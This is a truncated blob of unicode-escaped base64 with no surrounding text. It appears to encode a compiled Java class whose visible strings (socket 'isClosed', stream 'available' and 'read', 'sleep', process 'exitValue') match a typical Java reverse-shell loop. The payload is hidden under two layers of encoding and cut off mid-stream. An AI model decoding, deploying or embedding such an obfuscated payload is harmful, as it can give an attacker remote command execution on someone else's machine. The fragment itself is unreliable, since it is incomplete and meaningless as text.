u0057\u0046\u0074\u0041\u0051\u0041\u0059\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0070\u0062\u0079\u0039\u0050\u0064\u0058\u0052\u0077\u0064\u0058\u0052\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u0037\u0041\u0051\u0041\u0049\u0061\u0058\u004e\u0044\u0062\u0047\u0039\u007a\u005a\u0057\u0051\u0042\u0041\u0042\u004e\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u006c\u0076\u004c\u0030\u006c\u0075\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u0041\u0051\u0041\u004a\u0059\u0058\u005a\u0068\u0061\u0057\u0078\u0068\u0059\u006d\u0078\u006c\u0041\u0051\u0041\u0044\u004b\u0043\u006c\u004a\u0041\u0051\u0041\u0045\u0063\u006d\u0056\u0068\u005a\u0041\u0045\u0041\u0046\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0061\u0057\u0038\u0076\u0054\u0033\u0056\u0030\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u0041\u0051\u0041\u0045\u004b\u0045\u006b\u0070\u0056\u0067\u0045\u0041\u0042\u0058\u004e\u0073\u005a\u0057\u0056\u0077\u0041\u0051\u0041\u0045\u004b\u0045\u006f\u0070\u0056\u0067\u0045\u0041\u0043\u0057\u0056\u0034\u0061\u0058\u0052\u0057\u0059\u0057\u0078\u0031\u005a\u0051\u0045\u0041\u0043\u006d\u0064\u006c\u0064\u0045\u0031\u006c\u0063\u0033\u004e\u0068\u005a\u0032\u0055\u0042\u0041\u0041\u0068\u0070\u0062\u006e\u0052\u0057\u0059\u0057\u0078\u0031\u005a\u0051\u0041\u0068\u0041\u0049\u0077\u0041\u0048\u0067\u0041\u0042\u0041\u0041\u0038\u0041\u0041\u0067\u0041\u0043\u0041\u0049\u0030\u0041\u006a\u0067\u0041\u0041\u0041\u0041\u0049\u0041\u006a\u0077\u0043\u0051\u0041\u0041\u0041\u0041\u0043\u0051\u0041\u0042\u0041\u004a\u0045\u0041\u006b\u0067\u0041\u0043\u0041\u004a\u004d\u0041\u0041\u0041\u004f\u0032\u0041\u0041\u0059\u0041\u0045\u0077\u0041\u0041\u0041\u006f\u0034\u0071\u0074\u0077\u0041\u0042\u0075\u0041\u0041\u0043\u0074\u0067\u0041\u0044\u0054\u0043\u0075\u0032\u0041\u0041\u0051\u0053\u0042\u0062\u0059\u0041\u0042\u006b\u0030\u0073\u0042\u004c\u0059\u0041\u0042\u0079\u0077\u0072\u0074\u0067\u0041\u0049\u0077\u0041\u0041\u004a\u0077\u0041\u0041\u004a\u0054\u0069\u0030\u0036\u0042\u0042\u006b\u0045\u0076\u006a\u0059\u0046\u0041\u007a\u0059\u0047\u0046\u0051\u0059\u0056\u0042\u0061\u0049\u0043\u0057\u0042\u006b\u0045\u0046\u0051\u0059\u0079\u004f\u0067\u0063\u005a\u0042\u0038\u0063\u0041\u0042\u0071\u0063\u0043\u0051\u0078\u006b\u0048\u0074\u0067\u0041\u004b\u004f\u0067\u0067\u005a\u0043\u0042\u0049\u004c\u0074\u0067\u0041\u004d\u006d\u0067\u0041\u004e\u0047\u0051\u0067\u0053\u0044\u0062\u0059\u0041\u0044\u004a\u006f\u0041\u0042\u0071\u0063\u0043\u004a\u0052\u006b\u0048\u0074\u0067\u0041\u0045\u0045\u0067\u0036\u0032\u0041\u0041\u005a\u004e\u004c\u0041\u0053\u0032\u0041\u0041\u0063\u0073\u0047\u0051\u0065\u0032\u0041\u0041\u0067\u0036\u0043\u0052\u006b\u004a\u0077\u0051\u0041\u0050\u006d\u0067\u0041\u0047\u0070\u0077\u0049\u0043\u0047\u0051\u006d\u0032\u0041\u0041\u0051\u0053\u0045\u004c\u0059\u0041\u0042\u006b\u0030\u0073\u0042\u004c\u0059\u0041\u0042\u0079\u0077\u005a\u0043\u0062\u0059\u0041\u0043\u0044\u006f\u004a\u0047\u0051\u006d\u0032\u0041\u0041\u0051\u0053\u0045\u0062\u0059\u0041\u0042\u006b\u0032\u006e\u0041\u0042\u0059\u0036\u0043\u0068\u006b\u004a\u0074\u0067\u0041\u0045\u0074\u0067\u0041\u0054\u0074\u0067\u0041\u0054\u0045\u0068\u0047\u0032\u0041\u0041\u005a\u004e\u004c\u0041\u0053\u0032\u0041\u0041\u0063\u0073\u0047\u0051\u006d\u0032\u0041\u0041\u0067\u0036\u0043\u0052\u006b\u004a\u0074\u0067\u0041\u0045\u0074\u0067\u0041\u0054\u0045\u0068\u0053\u0032\u0041\u0041\u005a\u004e\u0070\u0077\u0041\u0051\u004f\u0067\u006f\u005a\u0043\u0062\u0059\u0041\u0042\u0042\u0049\u0055\u0074\u0067\u0041\u0047\u0054\u0053\u0077\u0045\u0074\u0067\u0041\u0048\u004c\u0042\u006b\u004a\u0074\u0067\u0041\u0049\u004f\u0067\u006b\u005a\u0043\u0062\u0059\u0041\u0042\u0042\u0049\u0056\u0074\u0067\u0041\u0047\u0054\u0053\u0077\u0045\u0074\u0067\u0041\u0048\u004c\u0042\u006b\u004a\u0074\u0067\u0041\u0049\u0077\u0041\u0041\u0057\u0077\u0041\u0041\u0057\u004f\u0067\u006f\u005a\u0043\u0072\u006b\u0041\u0046\u0077\u0045\u0041\u004f\u0067\u0073\u005a\u0043\u0037\u006b\u0041\u0047\u0041\u0045\u0041\u006d\u0051\u0046\u0062\u0047\u0051\u0075\u0035\u0041\u0042\u006b\u0042\u0041\u0044\u006f\u004d\u0047\u0051\u0079\u0032\u0041\u0041\u0051\u0053\u0047\u0072\u0059\u0041\u0042\u006b\u0030\u0073\u0042\u004c\u0059\u0041\u0042\u0079\u0077\u005a\u0044\u004c\u0059\u0041\u0043\u0044\u006f\u004e\u0047\u0051\u0032\u0032\u0041\u0041\u0051\u0053\u0047\u0077\u004f\u0039\u0041\u0042\u0079\u0032\u0041\u0042\u0030\u005a\u0044\u0051\u004f\u0039\u0041\u0042\u0036\u0032\u0041\u0042\u0038\u0036\u0044\u0068\u006b\u004e\u0074\u0067\u0041\u0045\u0045\u0069\u0041\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0030\u005a\u0044\u0051\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0078\u0049\u0069\u0055\u0037\u0059\u0041\u0048\u0038\u0041\u0041\u0049\u0054\u006f\u0050\u0047\u0051\u002f\u0048\u0041\u0041\u0061\u006e\u002f\u0035\u0045\u0071\u0047\u0051\u002b\u0032\u0041\u0043\u004f\u0032\u0041\u0043\u0051\u0036\u0045\u0042\u006b\u004f\u0074\u0067\u0041\u0045\u0045\u0069\u0055\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004f\u0079\u0041\u0043\u005a\u0054\u0074\u0067\u0041\u0064\u0047\u0051\u0034\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u0052\u0041\u004d\u0069\u0034\u0041\u0043\u0064\u0054\u0074\u0067\u0041\u0066\u0056\u0079\u006f\u0053\u004b\u004c\u0059\u0041\u004b\u0054\u006f\u0052\u0047\u0052\u0047\u0032\u0041\u0043\u006f\u0036\u0043\u0052\u006b\u0052\u0045\u0069\u0073\u0047\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u004c\u0046\u004e\u005a\u0042\u004c\u0049\u0041\u004a\u006c\u004e\u005a\u0042\u0062\u0049\u0041\u004a\u006c\u004f\u0032\u0041\u0043\u0030\u005a\u0043\u0051\u0061\u0039\u0041\u0042\u0035\u005a\u0041\u0078\u006b\u0051\u0055\u0031\u006b\u0045\u0041\u0037\u0067\u0041\u004a\u0031\u004e\u005a\u0042\u0052\u006b\u0051\u0076\u0072\u0067\u0041\u004a\u0031\u004f\u0032\u0041\u0042\u0039\u0058\u0047\u0051\u0036\u0032\u0041\u0041\u0051\u0053\u004c\u0067\u0053\u0039\u0041\u0042\u0078\u005a\u0041\u0078\u006b\u0052\u0055\u0037\u0059\u0041\u0048\u0052\u006b\u004f\u0042\u004c\u0030\u0041\u0048\u006c\u006b\u0044\u0047\u0051\u006c\u0054\u0074\u0067\u0041\u0066\u0056\u0036\u0063\u0041\u0054\u007a\u006f\u0052\u004b\u0068\u0049\u0077\u0074\u0067\u0041\u0070\u004f\u0068\u0049\u005a\u0045\u0068\u0049\u0078\u0042\u004c\u0030\u0041\u0048\u0046\u006b\u0044\u0045\u0069\u0078\u0054\u0074\u0067\u0041\u0074\u0047\u0052\u0049\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u005a\u0045\u0046\u004f\u0032\u0041\u0042\u0038\u0036\u0043\u0052\u006b\u004f\u0074\u0067\u0041\u0045\u0045\u0069\u0034\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u005a\u0045\u006c\u004f\u0032\u0041\u0042\u0030\u005a\u0044\u0067\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0078\u006b\u004a\u0055\u0037\u0059\u0041\u0048\u0031\u0065\u006e\u0041\u0041\u0036\u006e\u0041\u0041\u0055\u0036\u0043\u0049\u0051\u0047\u0041\u0061\u0066\u0039\u0070\u0037\u0045\u0041\u0042\u0077\u0043\u0067\u0041\u004b\u0073\u0041\u0072\u0067\u0041\u0053\u0041\u004d\u0034\u0041\u0033\u0041\u0044\u0066\u0041\u0042\u0049\u0042\u0078\u0041\u0049\u0077\u0041\u006a\u004d\u0041\u004c\u0077\u0041\u002f\u0041\u0045\u0051\u0043\u0068\u0051\u0041\u0076\u0041\u0045\u0063\u0041\u0059\u0067\u004b\u0046\u0041\u0043\u0038\u0041\u005a\u0051\u0043\u0046\u0041\u006f\u0055\u0041\u004c\u0077\u0043\u0049\u0041\u006e\u0038\u0043\u0068\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u004e\u0034\u0041\u004e\u0077\u0041\u0041\u0041\u0042\u0055\u0041\u0042\u0041\u0041\u0057\u0041\u0041\u0073\u0041\u0046\u0077\u0041\u0056\u0041\u0042\u0067\u0041\u0047\u0067\u0041\u005a\u0041\u0043\u0059\u0041\u0047\u0077\u0041\u002f\u0041\u0042\u0030\u0041\u0052\u0077\u0041\u0065\u0041\u0045\u0034\u0041\u0048\u0077\u0042\u006c\u0041\u0043\u0041\u0041\u0063\u0041\u0041\u0068\u0041\u0048\u0055\u0041\u0049\u0067\u0042\u0039\u0041\u0043\u004d\u0041\u0069\u0041\u0041\u006b\u0041\u004a\u004d\u0041\u004a\u0051\u0043\u0059\u0041\u0043\u0059\u0041\u006f\u0041\u0041\u006f\u0041\u004b\u0073\u0041\u004b\u0077\u0043\u0075\u0041\u0043\u006b\u0041\u0073\u0041\u0041\u0071\u0041\u004d\u0045\u0041\u004c\u0041\u0044\u0047\u0041\u0043\u0030\u0041\u007a\u0067\u0041\u0076\u0041\u004e\u0077\u0041\u004d\u0067\u0044\u0066\u0041\u0044\u0041\u0041\u0034\u0051\u0041\u0078\u0041\u004f\u0077\u0041\u004d\u0077\u0044\u0078\u0041\u0044\u0051\u0041\u002b\u0051\u0041\u0031\u0041\u0051\u0051\u0041\u004e\u0067\u0045\u004a\u0041\u0044\u0063\u0042\u0046\u0077\u0041\u0034\u0041\u0054\u004d\u0041\u004f\u0051\u0045\u002b\u0041\u0044\u006f\u0042\u0051\u0077\u0041\u0037\u0041\u0055\u0073\u0041\u0050\u0041\u0046\u006b\u0041\u0044\u0030\u0042\u0069\u0067\u0041\u002b\u0041\u0059\u0038\u0041\u0050\u0077\u0047\u0053\u0041\u0045\u0045\u0042\u006e\u0051\u0042\u0043\u0041\u0063\u0051\u0041\u0052\u0041\u0048\u004d\u0041\u0045\u0055\u0042\u0030\u0077\u0042\u0047\u0041\u0067\u0034\u0041\u0052\u0077\u0049\u0077\u0041\u0045\u0077\u0043\u004d\u0077\u0042\u0049\u0041\u006a\u0055\u0041\u0053\u0051\u0049\u0039\u0041\u0045\u006f\u0043\u0058\u0051\u0042\u004c\u0041\u006e\u0038\u0041\u0054\u0051\u004b\u0043\u0041\u0046\u0045\u0043\u0068\u0051\u0042\u0050\u0041\u006f\u0063\u0041\u0047\u0077\u004b\u004e\u0041\u0046\u004d\u0041\u006c\u0051\u0041\u0041\u0041\u0041\u0051\u0041\u0041\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0067\u0043\u0058\u0041\u0041\u004d\u0041\u006b\u0077\u0041\u0041\u0041\u0044\u006b\u0041\u0041\u0067\u0041\u0044\u0041\u0041\u0041\u0041\u0045\u0053\u0075\u0034\u0041\u0044\u004b\u0077\u0054\u0062\u0067\u0041\u0041\u0072\u0059\u0041\u004e\u0043\u0075\u0032\u0041\u0044\u0057\u0077\u0041\u0041\u0045\u0041\u0041\u0041\u0041\u0045\u0041\u0041\u0055\u0041\u004d\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0041\u004f\u0041\u0041\u004d\u0041\u0041\u0041\u0042\u0064\u0041\u0041\u0055\u0041\u0058\u0067\u0041\u0047\u0041\u0046\u0038\u0041\u006c\u0051\u0041\u0041\u0041\u0041\u0051\u0041\u0041\u0051\u0041\u007a\u0041\u004a\u0067\u0041\u0041\u0041\u0041\u0043\u0041\u004a\u006b\u0041\u0041\u0051\u0043\u0061\u0041\u004a\u0073\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0041\u002f\u0077\u0041\u0045\u0041\u0041\u0051\u0041\u0041\u0041\u0043\u0062\u004b\u0038\u0059\u0041\u0044\u0042\u0049\u0032\u004b\u0037\u0059\u0041\u004e\u0035\u006b\u0041\u0042\u0068\u0049\u0034\u0073\u0043\u0075\u0032\u0041\u0044\u006c\u004d\u004b\u0078\u0049\u0036\u0074\u0067\u0041\u0037\u006d\u0051\u0041\u0037\u004b\u0069\u0075\u0033\u0041\u0044\u0077\u0053\u0050\u0062\u0059\u0041\u0050\u006b\u0030\u0073\u0076\u0067\u0057\u0066\u0041\u0041\u0059\u0053\u0050\u0037\u0041\u0071\u004c\u0041\u004d\u0079\u0074\u0051\u0042\u0041\u004b\u0069\u0077\u0045\u004d\u0072\u0067\u0041\u0051\u0062\u0067\u0041\u004a\u0037\u0055\u0041\u0051\u0072\u0073\u0041\u0051\u0031\u006b\u0071\u0074\u0077\u0042\u0045\u0054\u0069\u0032\u0032\u0041\u0045\u0055\u0053\u0052\u0072\u0041\u0072\u0045\u006b\u0065\u0032\u0041\u0044\u0075\u005a\u0041\u0043\u0049\u0071\u004b\u0037\u0063\u0041\u0050\u0042\u0049\u0039\u0074\u0067\u0041\u002b\u0054\u0053\u0079\u002b\u0042\u005a\u0038\u0041\u0042\u0068\u004a\u0049\u0073\u0043\u006f\u0073\u0041\u007a\u0049\u0073\u0042\u0044\u004b\u0032\u0041\u0045\u006d\u0077\u004b\u0078\u004a\u004b\u0074\u0067\u0041\u0037\u006d\u0051\u0041\u004e\u004b\u0069\u006f\u0072\u0074\u0077\u0041\u0038\u0074\u0067\u0042\u004c\u0073\u0043\u006f\u0071\u004b\u0037\u0063\u0041\u0050\u004c\u0059\u0041\u0053\u0037\u0041\u0041\u0041\u0041\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0053\u0041\u0042\u0051\u0041\u0041\u0041\u0042\u0070\u0041\u0041\u0030\u0041\u0061\u0067\u0041\u0051\u0041\u0047\u0077\u0041\u0046\u0051\u0042\u0074\u0041\u0042\u0034\u0041\u0062\u0077\u0041\u0070\u0041\u0048\u0041\u0041\u004c\u0077\u0042\u0078\u0041\u0044\u0049\u0041\u0063\u0077\u0041\u0035\u0041\u0048\u0051\u0041\u0052\u0067\u0042\u0031\u0041\u0045\u0038\u0041\u0064\u0067\u0042\u0054\u0041\u0048\u0063\u0041\u0056\u0067\u0042\u0034\u0041\u0046\u0038\u0041\u0065\u0051\u0042\u0071\u0041\u0048\u006f\u0041\u0063\u0041\u0042\u0037\u0041\u0048\u004d\u0041\u0066\u0051\u0042\u002b\u0041\u0048\u0034\u0041\u0068\u0077\u0042\u002f\u0041\u004a\u0045\u0041\u0067\u0051\u0041\u0042\u0041\u004a\u0077\u0041\u006e\u0051\u0041\u0042\u0041\u004a\u004d\u0041\u0041\u0041\u0042\u0032\u0041\u0041\u004d\u0041\u0042\u0051\u0041\u0041\u0041\u0044\u0061\u0037\u0041\u0045\u0078\u005a\u004b\u0037\u0063\u0041\u0054\u0055\u0036\u0037\u0041\u0045\u0035\u005a\u004c\u0062\u0063\u0041\u0054\u007a\u006f\u0045\u0047\u0051\u0051\u0073\u0075\u0041\u0042\u0051\u0074\u0067\u0042\u0052\u0047\u0051\u0053\u0032\u0041\u0046\u0049\u005a\u0042\u004c\u0059\u0041\u0055\u0036\u0063\u0041\u0043\u007a\u006f\u0045\u0047\u0051\u0053\u0032\u0041\u0046\u0053\u0077\u004c\u0062\u0059\u0041\u0056\u0062\u0041\u0041\u0041\u0051\u0041\u004a\u0041\u0043\u0059\u0041\u004b\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0043\u0059\u0041\u0043\u0051\u0041\u0041\u0041\u0049\u0077\u0041\u0043\u0051\u0043\u004f\u0041\u0042\u004d\u0041\u006a\u0077\u0041\u0063\u0041\u004a\u0041\u0041\u0049\u0051\u0043\u0052\u0041\u0043\u0059\u0041\u006c\u0041\u0041\u0070\u0041\u004a\u0049\u0041\u004b\u0077\u0043\u0054\u0041\u0044\u0045\u0041\u006c\u0051\u0041\u0043\u0041\u004a\u0034\u0041\u006d\u0077\u0041\u0042\u0041\u004a\u004d\u0041\u0041\u0041\u0041\u0076\u0041\u0041\u004d\u0041\u0041\u0067\u0041\u0041\u0041\u0042\u0063\u0072\u0045\u006a\u006f\u0053\u004e\u0072\u0059\u0041\u0056\u0068\u004a\u004b\u0045\u006a\u0061\u0032\u0041\u0046\u0059\u0053\u0052\u0078\u0049\u0032\u0074\u0067\u0042\u0057\u0073\u0041\u0041\u0041\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0041\u0059\u0041\u0041\u0051\u0041\u0041\u0041\u004a\u0034\u0041\u0041\u0051\u0043\u0066\u0041\u004a\u0073\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0042\u0078\u0077\u0041\u0045\u0041\u0041\u006b\u0041\u0041\u0041\u0045\u006e\u0045\u006c\u0065\u0034\u0041\u0046\u0069\u0032\u0041\u0046\u006c\u004e\u004b\u0037\u0059\u0041\u004f\u0055\u0077\u0042\u0054\u0069\u0077\u0053\u0057\u0072\u0059\u0041\u0044\u004a\u006b\u0041\u0051\u0043\u0073\u0053\u0057\u0037\u0059\u0041\u0044\u004a\u006b\u0041\u0049\u0043\u0073\u0053\u0058\u004c\u0059\u0041\u0044\u004a\u006f\u0041\u0046\u0037\u0073\u0041\u0058\u0056\u006d\u0033\u0041\u0046\u0034\u0072\u0074\u0067\u0042\u0066\u0045\u006d\u0043\u0032\u0041\u0046\u002b\u0032\u0041\u0047\u0046\u004d\u0042\u0072\u0030\u0041\u0049\u0056\u006b\u0044\u0045\u0069\u004a\u0054\u0057\u0051\u0051\u0053\u0059\u006c\u004e\u005a\u0042\u0053\u0074\u0054\u004f\u0067\u0053\u006e\u0041\u0044\u0030\u0072\u0045\u006c\u0075\u0032\u0041\u0041\u0079\u005a\u0041\u0043\u0041\u0072\u0045\u006c\u0079\u0032\u0041\u0041\u0079\u0061\u0041\u0042\u0065\u0037\u0041\u0046\u0031\u005a\u0074\u0077\u0042\u0065\u004b\u0037\u0059\u0041\u0058\u0078\u004a\u006a\u0074\u0067\u0042\u0066\u0074\u0067\u0042\u0068\u0054\u0041\u0061\u0039\u0041\u0043\u0046\u005a\u0041\u0078\u004a\u006b\u0055\u0031\u006b\u0045\u0045\u006d\u0056\u0054\u0057\u0051\u0055\u0072\u0055\u007a\u006f\u0045\u0075\u0041\u0042\u006d\u0047\u0051\u0053\u0032\u0041\u0047\u0064\u004f\u0075\u0077\u0042\u006f\u0057\u0053\u0032\u0032\u0041\u0047\u006d\u0033\u0041\u0047\u006f\u0053\u0061\u0037\u0059\u0041\u0062\u0044\u006f\u0046\u0047\u0051\u0057\u0032\u0041\u0047\u0032\u005a\u0041\u0041\u0073\u005a\u0042\u0062\u0059\u0041\u0062\u0071\u0063\u0041\u0042\u0052\u0049\u0032\u004f\u0067\u0061\u0037\u0041\u0047\u0068\u005a\u004c\u0062\u0059\u0041\u0062\u0037\u0063\u0041\u0061\u0068\u004a\u0072\u0074\u0067\u0042\u0073\u004f\u0067\u0057\u0037\u0041\u0046\u0031\u005a\u0074\u0077\u0042\u0065\u0047\u0051\u0061\u0032\u0041\u0046\u0038\u005a\u0042\u0062\u0059\u0041\u0062\u005a\u006b\u0041\u0043\u0078\u006b\u0046\u0074\u0067\u0042\u0075\u0070\u0077\u0041\u0046\u0045\u006a\u0061\u0032\u0041\u0046\u002b\u0032\u0041\u0047\u0045\u0036\u0042\u0068\u006b\u0047\u004f\u0067\u0063\u0074\u0078\u0067\u0041\u0048\u004c\u0062\u0059\u0041\u0063\u0042\u006b\u0048\u0073\u0044\u006f\u0046\u0047\u0051\u0057\u0032\u0041\u0046\u0051\u0036\u0042\u0069\u0033\u0047\u0041\u0041\u0063\u0074\u0074\u0067\u0042\u0077\u0047\u0051\u0061\u0077\u004f\u0067\u0067\u0074\u0078\u0067\u0041\u0048\u004c\u0062\u0059\u0041\u0063\u0042\u006b\u0049\u0076\u0077\u0041\u0045\u0041\u004a\u0041\u0041\u002b\u0077\u0045\u0047\u0041\u0043\u0038\u0041\u006b\u0041\u0044\u0037\u0041\u0052\u006f\u0041\u0041\u0041\u0045\u0047\u0041\u0051\u0038\u0042\u0047\u0067\u0041\u0041\u0041\u0052\u006f\u0042\u0048\u0041\u0045\u0061\u0041\u0041\u0041\u0041\u0041\u0051\u0043\u0055\u0041\u0041\u0041\u0041\u0062\u0067\u0041\u0062\u0041\u0041\u0041\u0041\u0070\u0077\u0041\u004a\u0041\u004b\u0067\u0041\u0044\u0067\u0043\u0070\u0041\u0042\u0041\u0041\u0071\u0077\u0041\u005a\u0041\u004b\u0077\u0041\u004b\u0077\u0043\u0074\u0041\u0044\u0038\u0041\u0072\u0077\u0042\u0057\u0041\u004c\u0045\u0041\u0061\u0041\u0043\u0079\u0041\u0048\u0077\u0041\u0074\u0041\u0043\u0051\u0041\u004c\u0063\u0041\u006d\u0051\u0043\u0034\u0041\u004b\u0073\u0041\u0075\u0051\u0043\u002f\u0041\u004c\u006f\u0041\u0030\u0051\u0043\u0037\u0041\u0050\u0063\u0041\u0076\u0041\u0044\u0037\u0041\u004d\u0041\u0041\u002f\u0077\u0044\u0042\u0041\u0051\u004d\u0041\u0076\u0041\u0045\u0047\u0041\u004c\u0030\u0042\u0043\u0041\u0043\u002b\u0041\u0051\u0038\u0041\u0077\u0041\u0045\u0054\u0041\u004d\u0045\u0042\u0046\u0077\u0043\u002b\u0041\u0052\u006f\u0041\u0077\u0041\u0045\u0067\u0041\u004d\u0045\u0042\u004a\u0041\u0044\u0044\u0041\u0041\u0045\u0041\u006f\u0041\u0043\u0068\u0041\u0041\u0045\u0041\u006b\u0077\u0041\u0041\u0041\u0056\u006b\u0041\u0042\u0041\u0041\u004d\u0041\u0041\u0041\u0041\u0079\u0052\u004a\u0058\u0075\u0041\u0042\u0059\u0074\u0067\u0042\u005a\u0045\u006c\u0071\u0032\u0041\u0041\u0079\u0061\u0041\u0041\u006b\u0053\u0063\u0055\u0036\u006e\u0041\u0041\u0059\u0053\u0063\u006b\u0036\u0034\u0041\u0047\u0059\u0074\u0074\u0067\u0042\u007a\u004f\u0067\u0053\u0037\u0041\u0048\u0052\u005a\u004b\u0078\u0079\u0033\u0041\u0048\u0055\u0036\u0042\u0052\u006b\u0045\u0074\u0067\u0042\u0070\u004f\u0067\u0059\u005a\u0042\u004c\u0059\u0041\u0062\u007a\u006f\u0048\u0047\u0051\u0057\u0032\u0041\u0048\u0059\u0036\u0043\u0042\u006b\u0045\u0074\u0067\u0042\u0033\u004f\u0067\u006b\u005a\u0042\u0062\u0059\u0041\u0065\u0044\u006f\u004b\u0047\u0051\u0057\u0032\u0041\u0048\u006d\u0061\u0041\u0047\u0041\u005a\u0042\u0072\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004b\u0047\u0051\u0061\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0042\u0037\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004b\u0047\u0051\u0065\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0043\u004c\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004a\u0047\u0051\u0069\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0043\u0072\u0059\u0041\u0066\u0052\u006b\u004a\u0074\u0067\u0042\u0039\u0046\u0041\u0042\u002b\u0075\u0041\u0043\u0041\u0047\u0051\u0053\u0032\u0041\u0049\u0046\u0058\u0070\u0077\u0041\u0049\u004f\u0067\u0075\u006e\u002f\u0035\u0034\u005a\u0042\u004c\u0059\u0041\u0063\u0042\u006b\u0046\u0074\u0067\u0043\u0043\u0070\u0077\u0041\u004a\u0054\u0069\u0032\u0032\u0041\u0049\u004e\u0058\u0073\u0051\u0041\u0043\u0041\u004b\u0063\u0041\u0072\u0051\u0043\u0077\u0041\u0043\u0038\u0041\u0041\u0041\u0043\u002f\u0041\u004d\u0049\u0041\u004c\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0075\u0041\u0042\u0073\u0041\u0041\u0041\u0044\u0050\u0041\u0042\u0041\u0041\u0030\u0041\u0041\u0057\u0041\u004e\u0049\u0041\u0047\u0051\u0044\u0055\u0041\u0043\u0049\u0041\u0031\u0051\u0041\u0074\u0041\u004e\u0059\u0041\u0051\u0067\u0044\u0058\u0041\u0046\u0041\u0041\u0032\u0041\u0042\u0059\u0041\u004e\u006b\u0041\u0059\u0041\u0044\u0061\u0041\u0047\u0030\u0041\u0033\u0041\u0042\u0031\u0041\u004e\u0030\u0041\u0067\u0067\u0044\u0066\u0041\u0049\u006f\u0041\u0034\u0041\u0043\u0058\u0041\u004f\u0049\u0041\u006e\u0041\u0044\u006a\u0041\u004b\u0045\u0041\u0035\u0041\u0043\u006e\u0041\u004f\u0059\u0041\u0072\u0051\u0044\u006e\u0041\u004c\u0041\u0041\u0036\u0041\u0043\u0079\u0041\u004f\u006b\u0041\u0074\u0051\u0044\u0072\u0041\u004c\u006f\u0041\u0037\u0041\u0043\u002f\u0041\u004f\u0038\u0041\u0077\u0067\u0044\u0074\u0041\u004d\u004d\u0041\u0037\u0067\u0044\u0049\u0041\u0050\u0041\u0041\u0041\u0051\u0043\u0069\u0041\u004a\u0049\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0041\u004c\u0041\u0041\u0044\u0041\u0041\u0045\u0041\u0041\u0041\u0041\u0051\u004b\u0069\u0071\u0030\u0041\u0045\u0041\u0071\u0074\u0041\u0042\u0043\u0074\u0067\u0043\u0045\u0074\u0067\u0043\u0046\u0073\u0051\u0041\u0041\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0041\u006f\u0041\u0041\u0067\u0041\u0041\u0041\u0050\u0051\u0041\u0044\u0077\u0044\u0031\u0041\u0041\u006b\u0041\u006f\u0077\u0043\u006b\u0041\u0041\u0045\u0041\u006b\u0077\u0041\u0041\u0041\u0052\u0077\u0041\u0042\u0067\u0041\u0045\u0041\u0041\u0041\u0041\u0072\u0041\u0046\u004d\u0045\u006f\u0061\u0034\u0041\u0044\u004a\u004e\u004c\u0042\u004b\u0048\u0042\u004c\u0030\u0041\u0048\u0046\u006b\u0044\u0045\u0069\u0046\u0054\u0074\u0067\u0041\u0064\u004c\u004c\u0059\u0041\u004b\u0067\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0079\u0070\u0054\u0074\u0067\u0041\u0066\u0077\u0041\u0041\u0073\u0077\u0041\u0041\u0073\u0054\u004b\u0063\u0041\u0042\u0045\u0030\u0072\u0078\u0077\u0042\u0044\u0045\u006f\u0069\u0034\u0041\u0044\u0049\u0053\u0069\u0051\u004f\u0039\u0041\u0042\u0079\u0032\u0041\u0042\u0030\u0042\u0041\u0037\u0030\u0041\u0048\u0072\u0059\u0041\u0048\u0030\u0030\u0073\u0074\u0067\u0041\u0045\u0045\u006f\u006f\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0030\u0073\u0042\u004c\u0030\u0041\u0048\u006c\u006b\u0044\u004b\u006c\u004f\u0032\u0041\u0042\u002f\u0041\u0041\u0043\u007a\u0041\u0041\u0043\u0078\u004d\u0070\u0077\u0041\u0045\u0054\u0053\u0076\u0048\u0041\u0044\u0051\u0053\u0069\u0037\u0067\u0041\u004d\u006b\u0030\u0073\u0045\u006f\u006f\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0031\u004f\u004c\u0053\u0079\u0032\u0041\u0043\u006f\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u0071\u0055\u0037\u0059\u0041\u0048\u0038\u0041\u0041\u004c\u004d\u0041\u0041\u004c\u0045\u0079\u006e\u0041\u0041\u0052\u004e\u004b\u0037\u0041\u0041\u0041\u0077\u0041\u0043\u0041\u0043\u0030\u0041\u004d\u0041\u0041\